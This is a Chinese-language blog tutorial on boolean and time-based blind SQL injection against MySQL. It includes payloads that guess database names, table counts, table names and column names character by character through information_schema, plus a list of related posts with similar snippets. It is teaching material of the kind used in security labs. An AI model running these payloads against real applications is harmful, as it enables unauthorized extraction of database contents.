Web渗透(二)——SQL注入之盲注

最新推荐文章于 2024-05-20 20:26:39 发布
最新推荐文章于 2024-05-20 20:26:39 发布
阅读量808 收藏 18
点赞数 18
分类专栏: web渗透 文章标签: 数据库 sql oracle
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61562251/article/details/134937357
版权

布尔盲注:通过返回消息的对错进行判断

  • If(判断内容,正确返回结果,错误返回结果) 可以替换成 case 判断内容 when 正确返回结果 then 错误返回结果 end
  • substr(要输出的内容,开始输出的位置,输出内容的大小) 可以替换成 left(要提取的内容,从左往右多少个) right(要提取的内容,从左往右多少个)
  • Ascii()ord()可以进行ASCII码值转换

总而言之就是猜,猜对有回显信息,猜错报错。与报错注入不同的是,该注入所报错内容只是简单说你错了,但是不会具体说哪里错了。所以报错注入方法不可用

1、判断是什么类型的注入(数值型和字符型)

1' and 1=1 #

1 and 1=1 #

2、判断数据库长度

lili' and length(database())=7#'

3、猜数据库的名称(二分法猜,或使用工具burp suite进行爆破)

lili' and if(substr(database(),2,1)='i',1,0)#

具体的爆破手法看bp软件的介绍

4、猜该数据库有几个表、获取表名的长度、猜表名

lili' and (select count(table_name) from information_schema.TABLES where table_schema=database())=5#

 

lili' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=8 #

 

lili' and if(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='h',1,0)

5、获取字段数量、获取字段长度、猜字段名

select * from member where username='lili' and (select count(column_name) from information_schema.COLUMNS where table_name='httpinfo')=6#

select * from member where username='lili' and length(substr((select column_name from information_schema.COLUMNS where table_name='httpinfo' limit 0,1),1))=2 #

select * from member where username='lili' and if(substr((select column_name from information_schema.COLUMNS where table_name='httpinfo' limit 0,1),1,1)='i',1,0) #

6、获取字段下的数据数量、数据长度、数据

(原理一样)

 

时间盲注:通过

  • sleep():让语句延迟执行一段时间
  • benchmark():让语句执行一定的次数

(步骤流程和布尔盲注类似,只不过是将正确返回改成延迟执行)

舜华浮生
关注
  • 18
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WEB漏洞攻防 - SQL注入 - 盲注
易编橙 · 终身成长社群,相遇已是上上签!
07-29 816
盲注就是在注入过程中,获取的数据不能回显至前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。我们可以知道盲注分为以下三类:[这里介绍的是基于MYSQL的函数,其他类型的数据库思路相同,仅函数上有些许差异]
web安全 sql盲注和报错注入
m0_68167825的博客
06-13 767
可以基于这个函数,实现盲注。 例: 输入1’ and length(database())>3 – -得到了结果没有报错,所以可以得到数据库名字节数大于3, 输入1’ and length(database())>4 – -得到了结果报错,所以得到数据库名字节数不大于4, 输入1’ and length(database())=4 – -得到结果没报错,所以得到数据库名字节数为4.根据这两个函数得作用,来做盲注猜测。 输入1’ and ascii(substr(database(),1,1))>99 –
web ------ SQL注入------盲注
L0g1c的博客
07-20 238
有时目标存在注入,但是页面上没有任何回显,此时,我们需要利用一些方法进行判断或者尝试得到数据,这个过程称之为盲注
web渗透—— 基于布尔类型的盲注
王嘟嘟的博客
04-16 1347
0x00 前言 之前学习了。 0x01 知识点 1.盲注的基本实现 ascii(substr(database(),1,1))>100 2.盲注获取表 select table_name from information_schema.tables where table_schema=database() limit 0,1 3.盲注列名 select colu...
WebGoat SQL盲注 解题思路
Abracadabra的专栏
09-20 4637
WebGoat SQL盲注 解题思路 ★ 题目:SQL Injection (advanced) 地址: http://127.0.0.1:8080/WebGoat/start.mvc#lesson/SqlInjectionAdvanced.lesson/4 题目要求最终以Tom的身份登录到系统中。 LOGIN界面: REGISTER界面: ★ 什么是SQL盲注? 这是我自己的理解,不一定准确...
Web应用手工渗透测试——用SQLMap进行SQL盲注测试
02-26
本文主要关注SQL注入,假设读者已经了解一般的SQL注入技术,在我...本文演示从web界面注入SQL命令的方法,但不会直接连接到数据库,而是想办法使后端数据库处理程序将我们的查询语句当作SQL命令去执行。本文先描述一
SQL注入之基于布尔的盲注详解
09-10
首先说明的盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入盲注一般分为布尔盲注和基于时间的盲注。这篇文章主要讲解的是基于布尔的盲注。下面来一起看看吧。
多线程+分法的巧用——通达OA SQL盲注1
08-03
声明由于传播、利此所提供的信息造成的任何直接或者间接的后果及损失,均由使者本负责,雷神众测以及章作者不为此承担任何责任。雷神众测拥有对此章的修改和解释权。如欲转
31-31.渗透测试SQL注入盲注
05-10
渗透测试SQL注入盲注
Web安全之SQL注入攻击
03-04
①这个晨讲我构思了两个星期,但是之前电脑坏了,一直拖...今天由我给大家带来《web安全之SQL注入篇》系列晨讲,首先对课程进行简单介绍,SQL注入篇一共分为三讲:第一讲:“纸上谈兵:我们需要在本地架设注入环境,构
常见的Web漏洞——SQL注入
热门推荐
江左盟的博客
06-25 12万+
目录 SQL注入简介 SQL注入原理 SQL注入分类及判断 SQL注入方法 联合查询注入 基于bool的盲注 基于时间的盲注 总结 SQL注入简介 SQL注入是网站存在最多也是最简单的漏洞,主要原因是程序员在开发用户和数据库交互的系统时没有对用户输入的字符串进行过滤,转义,限制或处理不严谨,导致用户可以通过输入精心构造的字符串去非法获取到数据库中的数据。本文以免费开源数据库My...
WEB安全实战(一)SQL盲注
紫羽风的博客
10-30 3万+
前言 好长时间没有写过东西了,不是不想写,只不过是一直静不下心来写点东西。当然,拖了这么长的时间,也总该写点什么的。最近刚刚上手安全方面的东西,作为一个菜鸟,也本着学习的目的,就谈谈最近接触到的安全方面的问题吧。 背景 既然提到了背景,那我们就简单的带一下,最近互联网上爆出了各种惊人的事件、各种门、各种照的,归根结底,都是网络安全出的问题,有的是网络被别人监控
WebGoat——盲注
OOM
08-14 2057
工具介绍:盲注可以通过人工去做,但是成本太高,Webgoat提供一个工具Simple JHijack(下载地址),通过与Tamper Data(使用方法)的结合使用,能够完成部分盲注。 界面介绍: 具体的实施 1、Webgoat——Blind Numeric SQL Injection The form below allows a user to enter an account
WEB新手之布尔盲注
weixin_33971130的博客
04-29 122
  开始写SQL的题,单引号等特殊符号闭合漏洞比较简单,因此从Less-5开始写。   布尔盲注是多种盲注的一种,这种盲注方法也比较好理解。但使用这种盲注有一个前提,就是网页会有回显,透过这个回显,我们可以通过判断,来获得所需的信息。   以Less-5为例题,如图所示:   加上id=1,会发现这样的回显,如图所示:   然后利用Less-1~4的知识,发现这里的语句...
初学Web安全之sql注入(四)—— 盲注(1)
weixin_47531846的博客
12-03 197
盲注 当你的输入没有回显,也没有报错的时候,但是输入正确和错误的值时,页面有不同表现时,这时候我们可以尝试使用布尔盲注 布尔盲注sqli-labs第八关来举列 首先输入id=1,页面显示如下: 输入id=1’,页面出现不同结果,判断有闭合: 再次输入id=1",页面结果显示正常,初步判断语句闭合为单引号闭合: 接下来,我们就可以先尝试判断当前数据库的长度,然后再拆解表名,但是这里省略这一步,直接判断当前数据库有多少个表,构造语句开始尝试: PS:因为手工注入非常的耗费时间,所以我这里采用半自动
web安全入门(第四章-4)盲注注入
Yzz_的博客
05-26 336
一、盲注介绍 所谓盲注就是在服务器没有错误回显的时候完成的注入攻击。 服务器没有错误回显,对于攻击者来说缺少了非常重要的“调试信息”。 布尔盲注 布尔很明显trup跟fales,也就是说他只会根据你的诸如信息 返回trup跟fales,也就没有了之前的报错信息。 时间盲注 界面返回值只有一种,trup无论输入任何值,返回情况都会按 正常的来处理。加入特定的时间函数,通过查看web页面返回的时间差 来判断注入的语句是否正确。 盲注需要掌握的几个函数 length
4-Web安全——SQL盲注
网络安全
05-23 733
1. SQL盲注 在进行SQL注入过程中,如果当前页面没有报错回显,无法获取数据库返回结果的情况下,可以通过SQL盲注的方式对数据库中的内容进行猜解,盲注类型主要分为:布尔盲注和时间盲注。 当web页面只返回真假(true或false)两种不同类型的结果情况下,利用页面返回的不同类型结果逐个猜解数据,就可以使用布尔盲注,如果web页面不返回true或false类型的结果,则可以使用时间注入。 真实的注入环境中,web页面肯定不会直接回显true或false的,一般来说可以根据页面返回的结果作为依.
WEB手动漏洞挖掘-SQL盲注(DVWA实战)
含笑
05-20 6525
select * from table_name where id = ’ 1’ and 1=1– ’ 在盲注里至少要有一个正确的结果;否则不显示; 1'order by 5--+ 1'order by 3--+1'union select 1,2--+ 1'union select null,CONCAT_WS(CHAR(32,58.32),user(),database(),
【hackmyvm】Slowman靶机
最新发布
woshicainiao666的博客
05-20 945
发现/secretLOGIN/login.html为登录地址,根据账号密码登录发现一个zip,但是需要密码。在FTP中得到的账号,爆破一下SSH。上传linpeas.sh文件,报一下。SSH爆破无果,试试mysql。得到用户名和加密的密码。
sql注入union盲注
07-28
回答: SQL注入盲注可以分为三类:布尔盲注、延时盲注和报错盲注。其中,布尔盲注是一种通过构造逻辑表达式的SQL语句来判断数据的具体内容的盲注方式。在布尔盲注中,页面在执行SQL语句后,只显示两种结果,通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值